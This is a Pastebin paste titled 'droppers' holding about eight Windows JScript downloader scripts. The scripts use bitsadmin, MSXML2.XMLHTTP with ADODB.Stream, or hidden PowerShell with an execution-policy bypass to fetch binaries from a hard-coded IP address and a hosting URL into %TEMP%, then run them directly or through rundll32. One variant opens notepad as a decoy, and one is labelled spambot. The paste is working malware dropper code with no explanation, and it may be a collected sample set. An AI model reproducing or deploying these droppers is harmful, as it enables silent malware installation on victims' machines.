Advertisement
benkow_

droppers

Nov 12th, 2016
162
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. bitsadmin_dll_100.js:
  2. var shell = new ActiveXObject("shell.application");shell.ShellExecute("cmd", "/c bitsadmin /transfer n http://178.33.182.145/dll/100.bin %TEMP%\\100.dll & rundll32 %TEMP%\\100.dll, DllRegisterServer", "", "open", 0);
  3.  
  4. bitsadmin_exe_100.js:
  5. var shell = new ActiveXObject("shell.application");shell.ShellExecute("cmd", "/c bitsadmin /transfer n http://178.33.182.145/file/100.bin %TEMP%\\100.exe & %TEMP%\\100.exe", "", "open", 0);
  6.  
  7. js_dll_100.js:
  8. var shell = new ActiveXObject("WScript.Shell");
  9. var path = shell.ExpandEnvironmentStrings("%TEMP%") + '\\' + Math.round(1000000 * Math.random()) + ".bin";
  10. var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
  11.  
  12. xmlhttp.onreadystatechange = function() {
  13.     if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
  14.         var stream = new ActiveXObject("ADODB.Stream");
  15.         stream.open();
  16.         stream.type = 1;
  17.         stream.write(xmlhttp.ResponseBody);
  18.         if (stream.size > 5000) {
  19.             stream.position = 0;
  20.             stream.saveToFile(path, 2);
  21.             WScript.Sleep(2000);
  22.             shell.Run("rundll32 " + path + ", DllRegisterServer", 1, 0);
  23.         };
  24.         stream.close();
  25.     };
  26. };
  27.  
  28. xmlhttp.open('POST', 'http://178.33.182.145/dll/100.bin', false);
  29. xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  30. xmlhttp.send();
  31.  
  32. js_exe_100.js:
  33. var shell = new ActiveXObject("WScript.Shell");
  34. var path = shell.ExpandEnvironmentStrings("%TEMP%") + '\\' + Math.round(1000000 * Math.random()) + ".exe";
  35. var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
  36.  
  37. xmlhttp.onreadystatechange = function() {
  38.     if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
  39.         var stream = new ActiveXObject("ADODB.Stream");
  40.         stream.open();
  41.         stream.type = 1;
  42.         stream.write(xmlhttp.ResponseBody);
  43.         if (stream.size > 5000) {
  44.             stream.position = 0;
  45.             stream.saveToFile(path, 2);
  46.             WScript.Sleep(2000);
  47.             shell.Run(path, 1, 0);
  48.         };
  49.         stream.close();
  50.     };
  51. };
  52.  
  53. xmlhttp.open('POST', 'http://178.33.182.145/file/100.bin', false);
  54. xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  55. xmlhttp.send();
  56.  
  57.  
  58. js_exe_notepad_100.js:
  59. var shell = new ActiveXObject("WScript.Shell");
  60. var path = shell.ExpandEnvironmentStrings("%TEMP%") + '\\' + Math.round(1000000 * Math.random()) + ".exe";
  61. var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
  62.  
  63. xmlhttp.onreadystatechange = function() {
  64.     if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
  65.         var stream = new ActiveXObject("ADODB.Stream");
  66.         stream.open();
  67.         stream.type = 1;
  68.         stream.write(xmlhttp.ResponseBody);
  69.         if (stream.size > 5000) {
  70.             stream.position = 0;
  71.             stream.saveToFile(path, 2);
  72.             WScript.Sleep(2000);
  73.             shell.Run(path, 1, 0);
  74.         };
  75.         stream.close();
  76.     };
  77. };
  78.  
  79. xmlhttp.open('POST', 'http://178.33.182.145/file/100.bin', false);
  80. xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  81. xmlhttp.send();
  82. shell.Run("notepad.exe", 1, 0);
  83.  
  84.  
  85. powershell_dll_100.js:
  86. var shell = new ActiveXObject("shell.application");
  87. shell.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://178.33.182.145/dll/100.bin','%TEMP%\\100.dll'); rundll32 '%TEMP%\\100.dll', DllRegisterServer", "", "open", 0);
  88.  
  89.  
  90. powershell_exe_100.js
  91. var shell = new ActiveXObject("shell.application");
  92. shell.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://178.33.182.145/file/100.bin','%TEMP%\\100.exe'); %TEMP%\\100.exe", "", "open", 0);
  93.  
  94. js_spambot.js
  95. var shell = new ActiveXObject("WScript.Shell");
  96. var path = shell.ExpandEnvironmentStrings("%TEMP%") + '\\' + Math.round(1000000 * Math.random()) + ".exe";
  97. var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
  98.  
  99. xmlhttp.onreadystatechange = function() {
  100.     if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
  101.         var stream = new ActiveXObject("ADODB.Stream");
  102.         stream.open();
  103.         stream.type = 1;
  104.         stream.write(xmlhttp.ResponseBody);
  105.         if (stream.size > 5000) {
  106.             stream.position = 0;
  107.             stream.saveToFile(path, 2);
  108.             WScript.Sleep(2000);
  109.             shell.Run(path, 1, 0);
  110.         };
  111.         stream.close();
  112.     };
  113. };
  114.  
  115. xmlhttp.open('POST', 'http://51892372.de.strato-hosting.eu/cgi-data/1.exe', false);
  116. xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  117. xmlhttp.send();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement